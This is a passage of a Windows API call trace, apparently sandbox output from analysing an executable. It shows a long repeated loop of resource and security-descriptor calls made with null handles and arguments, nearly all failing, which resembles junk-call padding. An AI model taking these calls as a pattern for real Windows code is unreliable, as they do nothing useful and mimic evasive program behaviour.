hWnd=0x0, lpRect=0x20bf340 | out: lpRect=0x20bf340) returned 0 [0069.894] ScrollWindowEx (in: hWnd=0x0, dx=0, dy=0, prcScroll=0x0, prcClip=0x0, hrgnUpdate=0x0, prcUpdate=0x20bf340, flags=0x6 | out: prcUpdate=0x20bf340) returned 0 [0069.894] SetScrollInfo (hwnd=0x0, nBar=1, lpsi=0x20bf29c, redraw=1) returned 0 [0069.895] GetLastError () returned 0x578 [0069.895] CreateFileA (lpFileName="", dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0069.895] GetFileSize (in: hFile=0xffffffff, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xffffffff [0069.895] GlobalLock (hMem=0x0) returned 0x0 [0069.895] ReadFile (in: hFile=0xffffffff, lpBuffer=0x0, nNumberOfBytesToRead=0xffffffff, lpNumberOfBytesRead=0x20bf010, lpOverlapped=0x0 | out: lpBuffer=0x0, lpNumberOfBytesRead=0x20bf010*=0x0, lpOverlapped=0x0) returned 0 [0069.895] GlobalUnlock (hMem=0x0) returned 1 [0069.895] CloseHandle (hObject=0xffffffff) returned 1 [0069.895] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x20bf018 | out: ppstm=0x20bf018*=0x5bc9a8) returned 0x0 [0069.896] GetMessagePos () returned 0x0 [0069.896] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0069.896] GetFileType (hFile=0x3c) returned 0x2 [0069.897] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0069.897] SetConsoleScreenBufferSize (hConsoleOutput=0x3c, dwSize=0x13880050) returned 0 [0069.907] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0069.907] GetFileType (hFile=0x40) returned 0x2 [0069.907] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0069.907] GetFileType (hFile=0x38) returned 0x2 [0069.908] NetAlertRaise (AlertType=0x0, Buffer=0x0, BufferSize=0x0) returned 0x32 [0069.908] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.909] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.909] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.911] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.911] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.911] LockResource (hResData=0x0) returned 0x0 [0069.911] FreeResource (hResData=0x0) returned 0 [0069.911] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.911] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.911] LockResource (hResData=0x0) returned 0x0 [0069.911] FreeResource (hResData=0x0) returned 0 [0069.911] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.911] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.911] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.911] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.911] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.911] LockResource (hResData=0x0) returned 0x0 [0069.911] FreeResource (hResData=0x0) returned 0 [0069.911] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.911] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.911] LockResource (hResData=0x0) returned 0x0 [0069.911] FreeResource (hResData=0x0) returned 0 [0069.911] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.911] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.911] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.911] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.911] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.911] LockResource (hResData=0x0) returned 0x0 [0069.911] FreeResource (hResData=0x0) returned 0 [0069.911] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.911] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.911] LockResource (hResData=0x0) returned 0x0 [0069.911] FreeResource (hResData=0x0) returned 0 [0069.912] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.912] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.912] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.912] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.912] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.912] LockResource (hResData=0x0) returned 0x0 [0069.912] FreeResource (hResData=0x0) returned 0 [0069.912] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.912] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.912] LockResource (hResData=0x0) returned 0x0 [0069.912] FreeResource (hResData=0x0) returned 0 [0069.912] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.912] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.912] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.912] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.912] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.912] LockResource (hResData=0x0) returned 0x0 [0069.912] FreeResource (hResData=0x0) returned 0 [0069.912] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.912] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.912] LockResource (hResData=0x0) returned 0x0 [0069.912] FreeResource (hResData=0x0) returned 0 [0069.912] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.912] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.912] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.912] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.912] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.912] LockResource (hResData=0x0) returned 0x0 [0069.912] FreeResource (hResData=0x0) returned 0 [0069.912] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.912] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.912] LockResource (hResData=0x0) returned 0x0 [0069.912] FreeResource (hResData=0x0) returned 0 [0069.912] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.912] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.912] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.912] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.912] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.912] LockResource (hResData=0x0) returned 0x0 [0069.912] FreeResource (hResData=0x0) returned 0 [0069.912] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.912] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.912] LockResource (hResData=0x0) returned 0x0 [0069.912] FreeResource (hResData=0x0) returned 0 [0069.912] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.912] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.912] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.912] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.912] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.913] LockResource (hResData=0x0) returned 0x0 [0069.913] FreeResource (hResData=0x0) returned 0 [0069.913] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.913] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.913] LockResource (hResData=0x0) returned 0x0 [0069.913] FreeResource (hResData=0x0) returned 0 [0069.913] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.913] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.913] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.913] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.913] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.913] LockResource (hResData=0x0) returned 0x0 [0069.913] FreeResource (hResData=0x0) returned 0 [0069.913] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.913] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.913] LockResource (hResData=0x0) returned 0x0 [0069.913] FreeResource (hResData=0x0) returned 0 [0069.913] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.913] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.913] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.913] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.913] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.913] LockResource (hResData=0x0) returned 0x0 [0069.913] FreeResource (hResData=0x0) returned 0 [0069.913] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.913] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.913] LockResource (hResData=0x0) returned 0x0 [0069.913] FreeResource (hResData=0x0) returned 0 [0069.913] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.913] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.913] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.913] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.913] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.913] LockResource (hResData=0x0) returned 0x0 [0069.913] FreeResource (hResData=0x0) returned 0 [0069.913] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.913] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.913] LockResource (hResData=0x0) returned 0x0 [0069.913] FreeResource (hResData=0x0) returned 0 [0069.913] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.913] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.913] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.913] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.913] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.913] LockResource (hResData=0x0) returned 0x0 [0069.913] FreeResource (hResData=0x0) returned 0 [0069.913] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.913] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.913] LockResource (hResData=0x0) returned 0x0 [0069.913] FreeResource (hResData=0x0) returned 0 [0069.914] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.914] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.914] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.914] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.914] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.914] LockResource (hResData=0x0) returned 0x0 [0069.914] FreeResource (hResData=0x0) returned 0 [0069.914] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.914] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.914] LockResource (hResData=0x0) returned 0x0 [0069.914] FreeResource (hResData=0x0) returned 0 [0069.914] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.914] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.914] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.914] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.914] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.914] LockResource (hResData=0x0) returned 0x0 [0069.914] FreeResource (hResData=0x0) returned 0 [0069.914] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.914] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.914] LockResource (hResData=0x0) returned 0x0 [0069.914] FreeResource (hResData=0x0) returned 0 [0069.914] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.914] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.914] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.914] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.914] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.914] LockResource (hResData=0x0) returned 0x0 [0069.914] FreeResource (hResData=0x0) returned 0 [0069.914] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.914] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.914] LockResource (hResData=0x0) returned 0x0 [0069.914] FreeResource (hResData=0x0) returned 0 [0069.914] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.914] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.914] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.914] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.914] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.914] LockResource (hResData=0x0) returned 0x0 [0069.914] FreeResource (hResData=0x0) returned 0 [0069.914] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.914] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.914] LockResource (hResData=0x0) returned 0x0 [0069.914] FreeResource (hResData=0x0) returned 0 [0069.914] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.914] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.914] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.914] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.914] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.914] LockResource (hResData=0x0) returned 0x0 [0069.915] FreeResource (hResData=0x0) returned 0 [0069.915] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.915] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.915] LockResource (hResData=0x0) returned 0x0 [0069.915] FreeResource (hResData=0x0) returned 0 [0069.915] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.915] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.915] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.915] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.915] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.915] LockResource (hResData=0x0) returned 0x0 [0069.915] FreeResource (hResData=0x0) returned 0 [0069.915] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.915] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.915] LockResource (hResData=0x0) returned 0x0 [0069.915] FreeResource (hResData=0x0) returned 0 [0069.915] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.915] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.915] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.915] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.915] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.915] LockResource (hResData=0x0) returned 0x0 [0069.915] FreeResource (hResData=0x0) returned 0 [0069.915] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.915] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.915] LockResource (hResData=0x0) returned 0x0 [0069.915] FreeResource (hResData=0x0) returned 0 [0069.915] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.915] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.915] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.915] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.915] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.915] LockResource (hResData=0x0) returned 0x0 [0069.915] FreeResource (hResData=0x0) returned 0 [0069.915] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.915] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.915] LockResource (hResData=0x0) returned 0x0 [0069.915] FreeResource (hResData=0x0) returned 0 [0069.915] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.915] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.915] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.915] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.915] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.915] LockResource (hResData=0x0) returned 0x0 [0069.915] FreeResource (hResData=0x0) returned 0 [0069.915] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.915] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.915] LockResource (hResData=0x0) returned 0x0 [0069.915] FreeResource (hResData=0x0) returned 0 [0069.916] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.916] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.916] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.916] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.916] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.916] LockResource (hResData=0x0) returned 0x0 [0069.916] FreeResource (hResData=0x0) returned 0 [0069.916] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.916] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.916] LockResource (hResData=0x0) returned 0x0 [0069.916] FreeResource (hResData=0x0) returned 0 [0069.916] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.916] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.916] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.916] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.916] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.916] LockResource (hResData=0x0) returned 0x0 [0069.916] FreeResource (hResData=0x0) returned 0 [0069.916] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.916] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.916] LockResource (hResData=0x0) returned 0x0 [0069.916] FreeResource (hResData=0x0) returned 0 [0069.916] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.916] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.916] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.916] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.916] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.916] LockResource (hResData=0x0) returned 0x0 [0069.916] FreeResource (hResData=0x0) returned 0 [0069.916] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.916] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.916] LockResource (hResData=0x0) returned 0x0 [0069.916] FreeResource (hResData=0x0) returned 0 [0069.916] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.916] 